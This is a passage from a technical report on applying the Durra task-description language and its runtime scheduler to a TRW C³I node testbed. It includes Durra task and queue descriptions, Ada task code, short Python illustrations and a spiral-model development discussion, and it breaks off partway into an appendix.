2. An instance of the Durra server must be started in each processor.
3. The scheduler must be started in one of the processors. The scheduler receives as an argument the name of the file containing the scheduler program generated by the compilation of the application description. This step initiates the execution of the application.
1.4.1. The Scheduler
The scheduler is the part of the Durra runtime system responsible for starting the tasks, establishing communication links, and monitoring the execution of the application. In addition, the scheduler implements the predefined tasks (broadcast, merge, and deal) and the data transformations described in [1]. The scheduler is invoked with the name of the file containing the scheduler instructions generated by the Durra compiler. A complete description of the scheduler instructions can be found in [3].
After these instructions have been read and processed, the scheduler is ready to start the execution of the application. In the current UNIX implementation, this is done by performing the following steps:
1. Allocate a UNIX socket for communication with the application tasks.
2. Establish communication with each of the processors running a Durra server.
3. For each of the task_load instructions, issue to the appropriate server a run_task remote procedure call.
4. Listen in on the UNIX socket allocated in the first step for remote procedure calls from the application tasks.
5. Process the remote procedure calls from the application tasks.
The scheduler waits until all tasks have completed their execution before it, in turn, finishes its execution.
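The steps above can be sketched schematically. The real scheduler uses UNIX sockets and remote procedure calls to out-of-process servers; in this illustrative sketch the servers are in-process stand-ins, and the `Server` class and `schedule` function are assumptions made for the example.

```python
# Schematic of the scheduler's startup sequence: contact each server and
# issue a run_task call for every task_load instruction (steps 2-3 above).
# Steps 4-5 (listening on a socket for RPCs from the tasks) are elided.

class Server:
    """Stand-in for a Durra server running on one processor."""
    def __init__(self, host):
        self.host, self.running = host, []
    def run_task(self, task):           # remote procedure call in real Durra
        self.running.append(task)

def schedule(load_instructions, servers):
    for host, task in load_instructions:
        servers[host].run_task(task)
    # The scheduler would now process task RPCs and finish only after
    # all tasks have completed.
    return sum(len(s.running) for s in servers.values())

servers = {"hostA": Server("hostA"), "hostB": Server("hostB")}
started = schedule([("hostA", "comm_control"), ("hostB", "comm_inbound")], servers)
print(started)
```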
1.4.2. The Server
The server is responsible for starting tasks on its corresponding processor, as directed by the scheduler. One copy of the server must be running on each processor that is to execute Durra tasks.
When a server begins execution, it listens in on a predetermined socket for messages from the scheduler. Once a communication channel is open, the scheduler communicates with the server using a set of remote procedure calls to initiate task execution (run_task), or to shutdown or restart the server (shutdown, and restart). Complete details of these remote procedure calls can be found in [3]. The server sits in a loop responding to the requests from the scheduler, executing them as directed.
1.4.3. Application Tasks
The component task implementations making up a Durra application can be written in any language for which a Durra interface has been provided. As of this writing, there are Durra interfaces for both C and Ada. The complete interfaces appear in [3].
When a task is started, the scheduler supplies it with the following information (via a server):
the name of the host on which the scheduler is executing, the UNIX socket on which the scheduler is listening for communications from the task, and a small integer to be used in identifying the task in future messages.
Application tasks use the interface to the scheduler to communicate with other tasks. From the point of view of the task implementation, this communication is accomplished via procedure calls, which return only when the operation is completed. The following remote procedure calls (RPCs) are provided:
- **init**: Opens a connection to the scheduler.
- **finish**: Informs the scheduler that the task is terminating.
- **get_portid**: Returns a descriptor for the application task to use when referring to a port.
- **get_typeid**: Returns a descriptor for the application task to use when referring to a type.
- **send_port**: Sends data through an output port of the application task.
- **get_port**: Gets data from an input port of the application task.
- **test_input_port**: Tests whether data is available on an input port.
- **test_output_port**: Tests whether there is room in a queue attached to an output port.
Durra tasks typically use these RPCs in the following order:
1. Call **init** to establish communication with the scheduler.
2. Call **get_portid** for each of the task ports (these ports must correspond to the ports used in the task description).
3. Call **get_typeid** for each of the task types (these types must correspond to the data types used in the task description).
4. Call **send_port** and **get_port** as necessary to send and receive data.
5. Call **finish** to break communication with the scheduler.
2. Introduction to the TRW C³I Testbed
The TRW command, control, communications, and intelligence (C³I) testbed is a collection of programs that implement a variety of functions found in C³I systems. These programs have been developed as a part of the Reusable C³I Node Independent Research and Development Project at TRW Defense Systems Group. The overall objective of this project is to reduce the cost and schedule for fielding state-of-the-art, next generation C³I systems. TRW plans to achieve this objective by developing a standardized architectural framework for C³I systems and reusable hardware and software components that are applicable over a wide range of target systems. The technical objectives for the Reusable C³I Node Project are to 1) develop a reusable C³I system architecture, including hardware and software components; 2) develop software and, if necessary, hardware components as building blocks within the architecture; and 3) test the flexibility of the architecture and components by demonstrating them on several actual target C³I systems.
In the remainder of this chapter we will address only one of several tasks identified by TRW as critical to their overall objective, namely the development of an architecture framework in which various C³I system building blocks fit. This would be used to define the interfaces and the possible combinations of building blocks during the definition of the reusable system baseline, and to help during the integration and testing of the application system. Other major tasks, not addressed in this report, include software component definition and development, hardware component selection and integration, and testbed integration and demonstration.
2.1. C³I Node Hardware Architecture
The architecture adopted for the reusable C³I node and its testbed is open so that any vendor's equipment could be connected and the node software integrated with the vendor-supplied hardware and system software. To reach this goal of an open system architecture, it is necessary to have a paradigm for programming loosely-connected networks of multiple special- and general-purpose processors. This is the role played by the Durra language and methodology. The need for experimenting with paradigms for heterogeneous networks provided the motivation for a joint effort between TRW Defense Systems Group and the Software Engineering Institute.
C³I systems have similar requirements and functions whether the system is for tactical or strategic forces, whether it is fixed-base or mobile, or whether it is controlling planes, tanks, or ships. The purpose of all such systems is to give up-to-the-minute information to commanders at each echelon to assist them in making decisions and to speed implementation of these decisions. The top-level description of a typical tactical C³I system is shown in Figure 2-1. This system consists of a network of geographically separated nodes where each node is a local area network of processors. Communication among the nodes (located
at command posts) is via combat net radios or land lines and consists of messages whose format and protocol is tightly controlled by Army standards and doctrine. Each node contains a database representing the battle situation (deployment of friendly and enemy forces) and the status of forces controlled by this command post. The overall information flow for the system is predominantly hierarchical, with messages containing orders or requests for information flowing from upper echelons to lower echelons and messages containing status and situation reports flowing back to the upper echelons.
Each node consists of a network of computers whose purpose is to process operator requests for information, to act on incoming messages (by showing them to an operator or replying automatically), and to maintain the situation and status database. The computers at a node may be concentrated in a command post structure (shelter, tent, or parked vehicle) or dispersed among several structures for concealment. They typically communicate via Ethernet or fiber-optic equivalents. At this level the communications protocols are not restricted and may support exchange of message text, database information, keyboard/screen information, etc. At each node in the system common processing is done: communications equipment management, message processing, data management, management of the LAN, and interaction with the operators. In addition, a node may have unique application responsibilities such as resource allocation, planning, and decision making.
2.2. C³I Node Software Architecture
TRW has defined a nodal software architecture which supports both the common processing functions and site- or system-specific ones. As shown in Figure 2-2, the architecture is extensively layered to support the open architecture concepts described above. In addition to multiple vendors, the architecture supports redistribution of functions among processors to support networks containing from 1 to 50 processors. The reusable C³I node IR&D Project is building software components for the shaded functional areas in the diagram. These components are implemented as Ada tasks and packages. The tasks communicate via messages using services provided by the Heterogeneous InterProcess Communication (IPC) function; in the testbed, alternative IPC functions have been implemented, one with the Durra runtime environment and one with a TRW-developed IPC. Figure 2-3 shows the top-level data flow in a system constructed from the components.
The "communication processing" area is a support subsystem which performs all of the processing associated with sending and receiving messages to or from other nodes in the system. It typically consists of a collection of hardware and firmware interfaces to the communications media and software to coordinate the operation of the subsystem. The tasks, which are top-level components of the communication processing subsystem, include media service, inbound message processing, outbound message processing, data services (log, archive, etc.), and communication control.
The "automated message handling (amh)" area is a subsystem which performs all proc-
Figure 2-1: C³I System Structure — Army Tactical System
Figure 2-2: Reusable C^3I Node Architecture Layers
Figure 2-3: Data Flow Among Nodal Software Components
essing of the text of incoming and outgoing messages for a node. For incoming messages, it identifies the message type and verifies that it is correctly formatted, extracts data from the message to update the database, and disseminates the message to intended recipients at the workstations. Outgoing message processing consists of review and message release routing within the node. The tasks which are the top-level components of the "AMH" subsystem are inbound message processing, outbound message processing, and control.
The "system management" area performs all of the executive and control functions for the nodal network. This includes:
- system startup, shutdown, and reconfiguration
- user login, access verification, and logout
- error reporting and monitoring
- health and performance monitoring
The components of system management are the overall system manager task and a subsidiary workstation manager task at computers for each operator station. Computers which perform only background processing do not contain a workstation manager.
The "data management" area performs all database access and control functions for a node. In most systems this is a commercial relational database management system such as SYBASE, ORACLE, etc., but may be as simple as a flat-file record handling system which keeps the data in primary memory. The components of this subsystem are the DBMS servers and the distributed server and client control logic.
The "user/system interface (usi)" area manages all interaction with the operators at each workstation in the node. This is a complicated subsystem which contains window managers, main menu (or other user selection mechanism) managers, text and graphic, tool support libraries, and other software to support a multi-window, networked environment.
The "application support" area provides interface and scheduling services for application tasks and contains the common office automation applications like electronic mail, word processing, and spreadsheets. The scheduling services include message event scheduling, database event scheduling, and time scheduling of application tasks.
The definition of the architecture and the implementation of the software components for the C³I testbed coincide with the Durra paradigm in many ways:
- Utilizing libraries of reusable "black-box" tasks.
- Describing the connectivity of the system outside the code of the task.
- Using message-oriented communication between the tasks.
- Describing data transformations during the transmission of the messages.
The flexibility and control over system operation provided by this paradigm are central to the open architecture concept and the ability to reuse the developed software modules. In the
remainder of this report, we will illustrate the use of Durra to build applications consisting of C³I node software modules in which the various tasks connected through queues exchange messages.
3. Task and Application Descriptions
In this chapter we illustrate the various kinds of descriptions that would be written in a typical application of Durra. The examples depict increasingly complex task descriptions. We first show a simple task description, of a task implemented by a single program and capable of running on one of the processors in a heterogeneous network. We then show a compound task description, that is, a task that consists of several simpler tasks whose ports are connected via data queues. Finally, we show an application description which, syntactically, looks like a compound task description and ties together all of the component tasks (simple or otherwise) of an application.
3.1. A Simple Task Description and Its Implementation
In this section we illustrate the relation between a Durra task description, a task implementation, and the interface between the task implementation and the Durra runtime environment. The task we have selected is the control module of the Automated Message Handler in the C³I node.
As described in Section 2.2, the automated message handling subsystem of the C³I node performs all processing of the text of incoming and outgoing messages for a node. As we show in this and in later sections, this subsystem consists of several tasks. One of these tasks, "amhs_control," is responsible for the overall operation of the subsystem and performs its job by sending requests to the other components of the subsystem and processing their responses. In addition, it provides the interface to other subsystems of the C³I node, specifically, the system manager subsystem.
```
task amhs_control
ports
SM_In : in system_command;
SM_Out : out subsystem_response;
Cmd_Out : out system_command;
Resp_In : in subsystem_response;
attributes
implementation = "amhs_control";
x10window = "80x12+0+0";
x11window = "-geometry 80x12+0+0";
processor = sun;
end amhs_control;
```
Figure 3-1: AMHS_Control Task Description
Figure 3-1 shows the Durra description of the "amhs_control" task. The interface portion of the task description indicates that it consumes data of type "system_command" and "subsystem_response" through input ports "SM_In" and "Resp_In," and produces data of type "subsystem_response" and "system_command" through output ports "SM_Out" and "Cmd_Out," respectively.
The attributes of the task description provide additional information about the task. These include the name of the task implementation (i.e., "amhs_control" is the actual executable program), the name of the processor or processor class on which this implementation can execute ("sun"), and the specification of a window geometry to be used for communication between a human operator and the task. Notice that two alternative window specifications are provided, depending on which version of the window manager is running on the processor to which the task will be allocated at runtime.
As indicated in Figure 1-5, for each task description, there is a corresponding task implementation. The latter is a program that will be loaded, at runtime, on one of the machines on the network and will communicate with other task implementations through ports. The task description indicates that this is a program that can run on a Sun workstation and that it communicates with a human operator through a small window (12 lines of 80 characters). This window specification is necessary because this task runs as an independent, interactive program, with its own terminal emulator running in the window. The server [3] running on the Sun workstation uses the window specification as part of the UNIX task initiation command.
The task implementation in this example is an Ada program, as shown in Figure 3-2. This program consists of a main unit, the procedure listed in the Figure ("AMH_Control"), and a separately compiled procedure ("AMH_Control_Processing"), not shown here. The main unit in this program is responsible for 1) establishing a connection with the Durra scheduler (call to "Init"), 2) getting a small integer token to identify each of its ports (calls to "Get_PortID"), 3) invoking the separate procedure, where the bulk of the application-specific work is done, and, finally, 4) notifying the Durra scheduler when it has completed its execution (call to "Finish").
Notice the correspondence between the port names used in the calls to “Get_PortID” in the task implementation of Figure 3-2 and the port names used in port declarations in the task description of Figure 3-1.
The separately compiled procedure ("AMH_Control_Processing") uses the port identifier tokens collected by the main procedure to invoke various input and output operations on these ports. This procedure is rather lengthy; instead of including the entire text, we illustrate the port operations via a small part of it, the procedure ("Read_Next_Message") shown in Figure 3-3. This small procedure loops continuously, testing for the presence of messages on the input ports (calls to "Test_Input_Port"). If there is at least one message on either of the ports, the procedure reads the message into a buffer (calls to "Get_Port") and returns to the caller.
There are a few more interface procedures to support the communication between the user task implementations and the Durra scheduler. However, for the purposes of this report, it is not necessary to go into further details. The complete interface to the scheduler is described in [3]. Appendix G contains the specifications of the interface package for Ada programs.
procedure AMH_Control is
pragma Priority(4);
Process_ID : Integer := 1001;
size : Integer;
bound : Integer;
Verbose : constant Boolean := True;
SM_In_Port : Positive;
SM_Out_Port : Positive;
Cmd_Out_Port : Positive;
Resp_In_Port : Positive;
procedure AMH_Control_Processing( Process_ID : in Integer)
is separate;
begin
Put_Line( "***** amh_control ***** " );
Interface.Init;
Interface.Get_PortID("SM_In", SM_In_Port, bound, size);
Interface.Get_PortID("SM_Out", SM_Out_Port, bound, size);
Interface.Get_PortID("Cmd_Out", Cmd_Out_Port, bound, size);
Interface.Get_PortID("Resp_In", Resp_In_Port, bound, size);
AMH_Control_Processing (Process_ID);
Interface.Finish;
return;
end AMH_Control;
Figure 3-2: AMHS Control Task Implementation
3.2. A Compound Task Description and Its Structure
The Durra language supports hierarchical task descriptions. The previous section illustrated a simple task description and its implementation. The task used in that example is one of several components of the Automated Message Handling System (AMHS). In this section we will use this and other similar, simple tasks to describe the complete message handler shown in Figure 3-4.
The "AMHS" subsystem consists of five tasks. Three of these tasks, "AMHS_control," "AMHS_inbound," "AMHS_outbound," are user-implemented ("AMHS_control" was shown in the previous section, the other two appear in Appendix B). The other two tasks, "broadcast" and "merge" are predefined in the Durra language and implemented directly by the Durra runtime system. A "broadcast" task takes data from a single input port and copies it to multiple output ports (the number of output ports is specified in the task selection). A "merge" task takes data from multiple input ports (specified in the task selection) and copies them into a single output port.
procedure Read_Next_Message(Msg_Type: in out Message_Type) is
Read_Cycle_Delay : Duration := 0.5;
Durra_type, size, n : natural;
begin
Read_Loop:
loop
Interface.Test_Input_Port( SM_In_Port,
Durra_type,
size,
n);
if n > 0 then
Interface.Get_Port( SM_In_Port,
Cmd_Msg'Address,
size,
Msg_Type);
exit Read_Loop;
end if;
Interface.Test_Input_Port( Resp_In_Port,
Durra_type,
size,
n);
if n > 0 then
Interface.Get_Port( Resp_In_Port,
Resp_Msg'Address,
size,
Msg_Type);
exit Read_Loop;
end if;
delay Read_Cycle_Delay;
end loop Read_Loop;
return;
end Read_Next_Message;
Figure 3-3: Sample Sequence of Port Operations
The application description instantiates five processes ("ac," "ai," "ao," "pb," and "pm"), corresponding to the five tasks mentioned above, and six queues ("q1" through "q6") that connect the processes' ports. Notice that not all the internal-task ports are connected. This group of tasks implements a subsystem which can be used as a building block for a larger system (the C³I node, in this case) and therefore must also have ports to communicate with other subsystems. Since the subsystem is an abstraction and does not correspond to an executable program, its ports ("SM_Commands," "SM_Responses," "COMM_Inbound," "COMM_Outbound," "WS_Inbound," and "WS_Outbound") must be implemented by internal-task ports. This is the purpose of the bind declarations, which declare the internal-task ports that implement or correspond to the subsystem ports.
task AMHS
-- Automated Message Handling Subsystem
ports
SM_Commands : in system_command;
SM_Responses : out subsystem_response;
COMM_Inbound : in comm_if_message;
COMM_Outbound : out comm_if_message;
WS_Inbound : out workstation_if_message;
WS_Outbound : in comm_if_message;
structure
process
ac : task AMHS_control;
ai : task AMHS_inbound;
ao : task AMHS_outbound;
pb : task broadcast
port
in1 : in system_command;
out1, out2 : out system_command;
end broadcast;
pm : task merge
port
in1, in2 : in subsystem_response;
out1 : out subsystem_response;
attribute
mode = fifo;
end merge;
bind
SM_Commands = ac.SM_In;
SM_Responses = ac.SM_Out;
COMM_Inbound = ai.COMM_Inbound;
COMM_Outbound = ao.COMM_Outbound;
WS_Inbound = ai.WS_Inbound;
WS_Outbound = ao.WS_Outbound;
queue
q1 : ac.Cmd_Out >> pb.in1;
q2 : pb.out1 >> ai.Cmd_In;
q3 : pb.out2 >> ao.Cmd_In;
q4 : ai.Resp_Out >> pm.in1;
q5 : ao.Resp_Out >> pm.in2;
q6 : pm.out1 >> ac.Resp_In;
end AMHS;
Figure 3-4: AMHS Subsystem Description
3.3. An Application Description
In this section we illustrate a complete application description. There are no special language features beyond those used to describe a compound task. An application description is simply a compound task description which is compiled and stored in a Durra library and, conceivably, could be used as a building block for a larger application.
From the point of view of the users of Durra, the main difference between a task description and an application description is that application descriptions are translated into directives to the runtime scheduler by executing an optional code generation phase of the Durra compiler, as described in [3].
Continuing with the examples of the previous sections, let's assume that the C³I node constitutes the complete application (i.e., we are ignoring the rest of the network -- it would consist of multiple instances of nodes and communication tasks). In addition to the Automated Message Handling System, there are several other components of the C³I node, as illustrated in Figure 3-5.
The C³I node consists of five main subsystems ("system_manager," "comm," "amhs," and two instances of "wkstn"). In addition, there are four predefined tasks (two broadcast and two merge) that serve to multiplex and demultiplex messages exchanged between the main subsystems, as shown in Figure 3-6.
The complete set of task descriptions and type declarations used to build the application are included in the appendices.
task configuration
structure
process
-- real system processes
sm : task system_manager;
com : task comm;
amh : task amhs;
wlp : task wkstn;
w2p : task wkstn;
-- auxiliary system processes
dmxp: task broadcast -- message demultiplexor
ports
in1 : in workstation_if_message;
out1, out2 : out workstation_if_message;
end broadcast;
muxp: task merge -- message multiplexor
ports
out1 : out comm_if_message;
in1, in2 : in comm_if_message;
attribute
mode = fifo;
end merge;
bc : task broadcast -- command broadcast
ports
in1 : in system_command;
out1, out2 : out system_command;
end broadcast;
mg : task merge -- response multiplexor
ports
in1, in2 : in subsystem_response;
out1 : out subsystem_response;
attribute
mode = fifo;
end merge;
queues
-- system command propagation
q_c1 : sm.SM_Out >> bc.in1;
q_c2 : bc.out1 >> com.SM_Commands;
q_c3 : bc.out2 >> amh.SM_Commands;
-- subsystem response propagation
q_r1 : com.SM_Responses >> mg.in1;
q_r2 : amh.SM_Responses >> mg.in2;
q_r3 : mg.out1 >> sm.SM_In;
-- inbound message propagation
q_i1 : com.Inbound >> amh.COMM_Inbound;
q_i2 : amh.WS_Inbound >> dmxp.in1;
q_i3 : dmxp.out1 >> wlp.Inbound;
q_i4 : dmxp.out2 >> w2p.Inbound;
-- outbound message propagation
q_o1 : wlp.Outbound >> muxp.in1;
q_o2 : w2p.Outbound >> muxp.in2;
q_o3 : muxp.out1 >> amh.WS_Outbound;
q_o4 : amh.COMM_Outbound >> com.Outbound;
end configuration;
Figure 3-5: C³I Node Description
Figure 3-6: C³I Node Structure
4. Software Development Methodologies
A great deal of effort has been devoted to the development of improved software development process models. As described in [5], models have evolved from the early "code-and-fix" model, through the "stagewise" and "waterfall" models (which attempt to bring order to the process by recognizing formal steps in the process), through the "evolutionary" and "transform" models (which attempt to address the need for experimentation, refinement of requirements, and automation of the code generation phase). The spiral model of the software process has evolved over several years at TRW, based on experience on a number of large software projects and, as indicated in [5], accommodates most previous models as special cases.
The spiral model is basically a refinement of the classical waterfall model, providing for successive applications of the original model (requirements, design, development, testing, etc.) to progressively more concrete versions of the final product.
One of the advantages of this model is that it allows the identification of areas of uncertainty that are significant sources of risk. Once these critical areas are identified, the spiral model allows for the selective application of an appropriate development strategy to these risk areas first. Thus, while at first sight the spiral model looks no better than the waterfall model, a key difference is that the spiral allows the designers to concentrate on selected problem areas rather than following a predetermined order. Once the highest-risk problem has been taken care of, the next higher risk area can be attacked, and so on.
To be successful, any approach based on successive refinements, such as the spiral model, must be supported by tools appropriate to the task at hand. Users of the spiral model must be able to selectively identify high-risk components of the product, establish their requirements, and then carry out the design, coding, and testing phases. Notice that this process need not be carried all the way through the testing phase -- still higher-risk components might be identified along the way, and these must be given priority, suspending development of what had previously been the riskiest component.
4.1. Durra as a Tool for Successive Refinement
The programming paradigm embodied in Durra fits this style of software development very naturally. Although we don't claim to have solved all problems or identified all the necessary tools, we would like to suggest that a language like Durra would be of great value in the context of the spiral model. It would allow the designer to build mock-ups of an application, starting with a gross decomposition into tasks described by templates that are specified by their interface and behavioral properties. Once this is completed, the application can be emulated using tools like MasterTask [4] as a stand-in for the yet-to-be-written task implementations.
The result of the emulation would identify areas of risk in the form of tasks whose timing
specifications are more critical or demanding. In other words, the purpose of this initial emulation is to identify the component tasks most likely to affect the performance of the entire system. The designers can then experiment by writing alternative behavioral specifications for the offending task until a satisfactory specification (i.e., template) is obtained. Once this is achieved, the designers can proceed by replacing the original task descriptions with more detailed templates, consisting of internal tasks and queues, using the structure description features of Durra. These more refined application descriptions can again be emulated, experimenting with alternative behavioral specifications of the internal tasks, until a satisfactory internal structure (i.e., decomposition) has been achieved. This process can be repeated as often as necessary, varying the degree of refinement of the tasks, and even backtracking if a dead-end is reached. It is not necessary to start coding a task until later, when its specifications are acceptable, and when the designers decide that it should not be further decomposed.
Of course, it is quite possible that a satisfactory specification might be impossible to meet and a task implementation might have to be rejected. The designers would then have to backtrack to an earlier, less detailed design and try alternative specifications, or even alternative decompositions of a parent subsystem. This is possible because we are following a strictly top-down approach. The effect of a change in an inner task would be reflected in its impact on the behavioral specifications of a parent task. The damage is, in a sense, contained and cannot spread to other parts of the design.
4.2. Incremental Development of the C³I Node
To illustrate an incremental development process using Durra, in this section we will show three alternative development sequences for the C³I node. In all three cases we start from the same basic configuration for the node shown in Figure 4-1. The node consists of four subsystems: System Manager, Communications, Application Message Handler, and Workstation.
These subsystems correspond to the first four process declarations in the structure of the Durra application description in Figure 4-1. In addition, the application description declares two auxiliary tasks which are used for communications between the system manager and the communication and application message handler subsystems. These auxiliary tasks broadcast commands from the system manager to the other two subsystems, and merge their responses to the system manager. The queue declarations in the Figure connect the task ports in the appropriate manner.
For brevity, we are not showing a simpler configuration that could have been our initial design. For example, we could have started with a node consisting of two subsystems: (combined) Communications, and Workstation. A first step could be to divide the first subsystem into three components: System Manager, Application Message Handler, and Communications proper. We take this as our initial design.
task configuration
structure
process
-- real system processes
sm : task system_manager;
com : task comm;
amh : task amhs;
wp : task wkstn;
-- auxiliary system processes
bc : task broadcast -- command broadcast
ports
in1 : in system_command;
out1, out2 : out system_command;
end broadcast;
mg : task merge -- response multiplexor
ports
in1, in2 : in subsystem_response;
out1 : out subsystem_response;
attribute
mode = fifo;
end merge;
queues
-- system command propagation
q_c1 : sm.SM_Out >> bc.in1;
q_c2 : bc.out1 >> com.SM_Commands;
q_c3 : bc.out2 >> amh.SM_Commands;
-- subsystem response propagation
q_r1 : com.SM_Responses >> mg.in1;
q_r2 : amh.SM_Responses >> mg.in2;
q_r3 : mg.out1 >> sm.SM_In;
-- inbound message propagation
q_i1 : com.Inbound >> amh.COMM_Inbound;
q_i2 : amh.WS_Inbound >> wp.Inbound;
-- outbound message propagation
q_o1 : wp.Outbound >> amh.WS_Outbound;
q_o4 : amh.COMM_Outbound >> com.Outbound;
end configuration;
Figure 4-1: Initial Application Description
Figure 4-2 shows the task descriptions for the subsystems of the initial configuration. Since at this stage of the development we might not be ready to commit to any particular structure for the subsystems, these are described as simple, unstructured tasks. This information is sufficient to do static checks, including port (i.e., type) compatibility and graph connectivity. We could continue the design in this fashion, successively refining the subsystem descriptions until, at the end, the application is fully described as a hierarchical graph structure in which the innermost nodes are implemented as separate programs, specified by the "implementation" attribute of the corresponding task description.
However, if we want to carry out some preliminary dynamic tests, we need to provide a pseudo-implementation for each subsystem. That is, we need to write ad hoc programs that emulate the input/output behavior of each of the subsystems and then specify these programs as the "implementation" attributes in the subsystem task descriptions. Alternatively, if a subsystem's behavior is relatively simple and repetitive, we could use "MasterTask" [4] as a subsystem emulator. To use MasterTask, we need to include a timing expression in the subsystem task description, and specify "master" as its "implementation" attribute. In fact, we can mix the two approaches and have some subsystems emulated by ad hoc programs, while other subsystems are emulated via MasterTask, as shown in Figure 4-2.
Figures 4-4, 4-5, and 4-6 show three possible design sequences starting from the original design of Figure 4-1 and ending with the final design shown in Figure 4-3. In Figure 4-4 we first replicate the workstation, then we decompose the communication and application message handlers, and finally we decompose the workstations. In Figure 4-5 we first decompose the communication and application message handler subsystems, then we replicate the workstation, and finally we decompose the workstation. In Figure 4-6 we carry out the design in yet a different order. First we decompose the communication and application message handler subsystems, then we decompose the workstation, and finally we replicate the workstation.
There are a number of other alternative design sequences leading to the same final design and we do not need to belabor the point.
task system_manager
ports
SM_In : in subsystem_response;
SM_Out : out system_command;
attributes
implementation = "system_manager_emulator";
processor = "Vax";
end system_manager;
(a) System Manager Subsystem
task comm
-- red communications processing
ports
SM_Commands : in system_command;
SM_Responses : out subsystem_response;
Inbound : out comm_if_message;
Outbound : in comm_if_message;
attributes
implementation = "comm_emulator";
processor = "Vax";
end comm;
(b) Communications Subsystem
task AMHS
-- Automated Message Handling Subsystem
ports
SM_Commands : in system_command;
SM_Responses : out subsystem_response;
COMM_Inbound : in comm_if_message;
COMM_Outbound: out comm_if_message;
WS_Inbound : out workstation_if_message;
WS_Outbound : in comm_if_message;
attributes
implementation = "amhs_emulator";
processor = "Vax";
end AMHS;
(c) Application Message Handler Subsystem
task wkstn
ports
Inbound : in workstation_if_message;
Outbound: out comm_if_message;
behavior
timing
loop
( (Inbound.dequeue delay[5, 60]) ||
(delay[*, 180] Outbound.enqueue) );
attributes
implementation = "master";
processor = "Vax";
end wkstn;
(d) Workstation Subsystem
Figure 4-2: Initial Task Descriptions
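One way to read the wkstn timing expression in Figure 4-2d is: on every loop iteration, in parallel, the task dequeues an inbound message and then "works" for 5 to 60 time units, while it also waits up to 180 units before enqueueing an outbound message. The Python sketch below is our interpretation of that behavior, not the MasterTask implementation; delays are scaled down so the example runs quickly.

```python
import queue
import random
import threading
import time

def emulate_wkstn(inbound, outbound, iterations=3, scale=0.001):
    """Crude MasterTask-style emulation of the wkstn timing expression."""
    for _ in range(iterations):
        def consume():
            inbound.get()                               # Inbound.dequeue
            time.sleep(random.uniform(5, 60) * scale)   # delay[5, 60]
        def produce():
            time.sleep(random.uniform(0, 180) * scale)  # delay[*, 180]
            outbound.put(b"outbound message")           # Outbound.enqueue
        arms = [threading.Thread(target=consume),
                threading.Thread(target=produce)]
        for t in arms:
            t.start()
        for t in arms:
            t.join()  # '||': both arms must finish before the next loop

inbound, outbound = queue.Queue(), queue.Queue()
for _ in range(3):
    inbound.put(b"inbound message")
emulate_wkstn(inbound, outbound)
print(outbound.qsize())  # 3
```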
Figure 4-3: Final Structure of the C³I Node
Figure 4-4: Incremental Development of the C³I Node — Sequence 1
Figure 4-5: Incremental Development of the C³I Node — Sequence 2
Figure 4-6: Incremental Development of the C³I Node — Sequence 3
5. Conclusions and Future Developments
This report contains the results of the first phase of a joint project between the Software Engineering Institute and TRW Defense Systems Group. The objective of this project is to demonstrate a new technology for developing distributed applications on networks of heterogeneous machines. We have chosen as the initial application domain prototype C³I applications built using the C³I testbed developed by TRW and the Durra language and methodology developed by the SEI.
To help provide direction to the effort and to evaluate our progress we identified three major phases: Basic Demonstration, Study of Networking Issues, and Advanced Demonstration. This report describes the results of the first phase. The second and third phases will be the subject of a report scheduled for the fall of 1989.
5.1. Basic Demonstration
The goal of the first phase was to demonstrate the basic functionality of a command and control application developed using Durra and the capability of supporting heterogeneous networking. In addition to demonstrating the application development methodology, the sample applications developed for the demonstration will provide an experimental facility for future performance measurements and evaluations. We accomplished this goal through several intermediate subgoals:
Defined common communication/scheduler primitives. The Durra model of computation assumes the use of a small set of message passing primitive operations. The TRW testbed tasks also use a message passing paradigm but their original interface was not as narrowly defined as in Durra. The narrow interface was adopted as the first step of the project and we modified the testbed software to use the Durra scheduler interface.
Developed Durra descriptions of C³I tasks, subsystems, and node. We analyzed the testbed modules and developed Durra descriptions of the tasks. Writing these descriptions required an understanding of the behavior of the testbed tasks, their performance and communication requirements (ports and message types), and the structure of typical applications in the C³I domain. We also developed Durra descriptions of the subsystems, defined by TRW as the architecture of the C³I node.
Demonstrated the methodology. All of the Durra task descriptions and the modified testbed modules were compiled and the distributed C³I node executed as expected, on the computer networks at the SEI and at TRW Defense Systems Group, using two types of workstations (MicroVax and Sun), two versions of UNIX (Ultrix-32 and BSD-4.3), and two versions of X windows (X10 and X11).
5.2. Study of Advanced Networking Issues
Following the successful demonstration of the basic methodology, we need to explore the extension or modification of the Durra paradigm of networking to meet more realistic C³I requirements.
**System robustness issues.** The current implementation of Durra uses a centralized scheduler. This was done mostly for expediency, to get the system up and running in a short time. It was always understood that a centralized critical resource was not acceptable as a long term solution. We are in the process of designing and implementing a distributed scheduler to enhance the reliability and availability of the applications.
**Dynamic application startup/reconfiguration.** The initial reconfiguration features of Durra are based on a preset (i.e., compile time) description of the conditions for a change and the nature of the change in the configuration of an application. This model might be too restrictive for a number of applications, and we will investigate the issues involved in developing an *interactive scheduler interface* to allow human operators to invoke arbitrary application reconfigurations.
**Default reconfiguration actions.** These two styles of reconfiguration (preset and interactive) might not be adequate to cope with all possible system anomalies that would trigger a reconfiguration. A Durra description that attempted to cover all possible anomalies would be unwieldy, unreadable, and most likely incomplete. By the same token, an operator might be swamped by the speed of events or confused as to the best action to take under real-time conditions. Thus, there is a need for default reconfiguration actions to be followed by the scheduler. These defaults should not be built-in but rather should be a property of the application and might vary over time, during the life of the application. We will investigate appropriate policies for taking default reconfiguration actions and the languages for specifying these policies.
5.3. Advanced Demonstration
The goal of this phase will be to demonstrate dynamic reconfiguration features (preset and interactive) to support fault tolerance. This is planned to be completed by September 1989. To achieve this goal, we have adopted the following intermediate subgoals:
**Demonstrate preset dynamic reconfiguration.** Augment the Durra application descriptions developed during the first phase (these descriptions are contained in this report) with dynamic reconfiguration statements. This requires the identification of typical reconfiguration requirements in C³I applications and their expression in Durra.
**Develop/demonstrate interactive dynamic reconfiguration.** We will implement a *system operator* program to allow direct communication between an operator and the runtime scheduler. This program will consist primarily of a simple user interface and a command interpreter that will take requests from an operator and will translate these into scheduler instructions to perform interactive reconfigurations.
**Develop/demonstrate policy language concepts.** We will implement a simple policy language and associated mechanisms to handle system anomalies when neither the preset nor interactive reconfiguration facilities are adequate.
References
[1] Durra: A Task-Level Description Language.
[2] Programming at the Processor-Memory-Switch Level.
[3] The Durra Runtime Environment.
[4] MasterTask: The Durra Task Emulator.
[5] A Spiral Model of Software Development and Enhancement.
Appendix A: C³I Node Application Description
task configuration
structure
process
-- real system processes
sm : task system_manager;
com : task comm;
amh : task amhs;
w1p : task wkstn;
w2p : task wkstn;
-- auxiliary system processes
dmxp: task broadcast -- message demultiplexor
ports
